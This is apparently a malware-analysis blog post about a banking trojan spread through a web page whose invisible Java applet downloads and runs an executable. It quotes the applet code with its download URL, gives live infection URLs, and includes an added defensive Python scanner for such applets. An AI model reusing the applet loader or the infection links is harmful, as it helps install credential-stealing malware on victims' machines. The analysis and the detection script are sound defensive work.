89.17.220.220 (banker hosted in Spain, Barcelona, Miarroba Networks S.L.)

The method here is this:
the Spanish or Brazilian hacker uses a Java applet to download and execute his banker on remote computers.
The malicious URL is this:
http://pics24.fileave.com/

To find out how the banker is downloaded and executed, you have to download the index.html file via wget for Windows:
http://users.ugent.be/~bpuype/wget/#usage

After downloading the index.html file, let's have a look inside the code:

<APPLET CODE = "Client.class" ARCHIVE = "Client.jar" WIDTH = "0" HEIGHT = "0">
<PARAM NAME = "AMLMAFOIEA" VALUE = "http://dl.dropbox.com/u/12138956/javaloader.exe">
</APPLET>

Easy, no? The hacker sends this URL, http://pics24.fileave.com/, to potential victims, and if they have Java installed, after opening the page they are automatically infected.
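As an added example (my own script, not something from the post or from the sample), here is a small Python scanner a defender can run over a saved index.html to flag this exact pattern: an APPLET tag with zero width and height, and a PARAM whose value is a URL pointing at an executable. The sample input embedded below is constructed from the applet block quoted above; the heuristics (zero-size applet, executable suffix list) are my assumptions about what is worth flagging, not anything the post defines.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: the applet block quoted in the post, wrapped in a minimal page.
SAMPLE_INDEX_HTML = """<html><body>
<APPLET CODE = "Client.class" ARCHIVE = "Client.jar" WIDTH = "0" HEIGHT = "0">
<PARAM NAME = "AMLMAFOIEA" VALUE = "http://dl.dropbox.com/u/12138956/javaloader.exe">
</APPLET>
</body></html>"""

# Assumed list of suffixes that should never be handed to an applet as a parameter.
EXECUTABLE_SUFFIXES = (".exe", ".jar", ".dll", ".scr", ".bat", ".cmd")


class AppletCollector(HTMLParser):
    """Collects every <applet> element together with its <param> children."""

    def __init__(self):
        super().__init__()
        self.applets = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names; values keep their case.
        attrs = {k: (v or "") for k, v in attrs}
        if tag == "applet":
            self._current = {"attrs": attrs, "params": {}}
            self.applets.append(self._current)
        elif tag == "param" and self._current is not None:
            self._current["params"][attrs.get("name", "")] = attrs.get("value", "")

    def handle_endtag(self, tag):
        if tag == "applet":
            self._current = None


def _is_zero(value):
    """True when a WIDTH/HEIGHT attribute is an integer <= 0 (invisible applet)."""
    try:
        return int(value.strip()) <= 0
    except ValueError:
        return False


def _looks_like_remote_executable(value):
    """True when a param value is an http(s) URL whose path ends in an executable suffix."""
    url = urlparse(value.strip())
    return url.scheme in ("http", "https") and url.path.lower().endswith(EXECUTABLE_SUFFIXES)


def scan_html(html):
    """Return one finding per applet that matches the hidden-downloader pattern."""
    parser = AppletCollector()
    parser.feed(html)
    findings = []
    for applet in parser.applets:
        a = applet["attrs"]
        reasons = []
        if _is_zero(a.get("width", "")) and _is_zero(a.get("height", "")):
            reasons.append("zero-size applet (invisible to the user)")
        urls = [v for v in applet["params"].values() if _looks_like_remote_executable(v)]
        for v in urls:
            reasons.append("param points at a remote executable: %s" % v)
        if reasons:
            findings.append({
                "code": a.get("code", ""),
                "archive": a.get("archive", ""),
                "reasons": reasons,
                "urls": urls,
            })
    return findings


if __name__ == "__main__":
    # Usage: python scan_applets.py < index.html, or run as-is on the embedded sample.
    import sys
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_INDEX_HTML
    for f in scan_html(data):
        print("suspicious applet: code=%s archive=%s" % (f["code"], f["archive"]))
        for r in f["reasons"]:
            print("  -", r)
```

The URLs it extracts are the download locations to block at the proxy or to search for in web logs; the applet class and archive names are what to look for on the hosting page itself.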

This is the ThreatExpert report:
http://www.threatexpert.com/report.aspx?md5=41a3fc3af67f51834d39fd819e408cbc

I'll leave it to you to download Client.jar and Client.class from the page.

Hosting info:
http://whois.domaintools.com/89.17.220.220
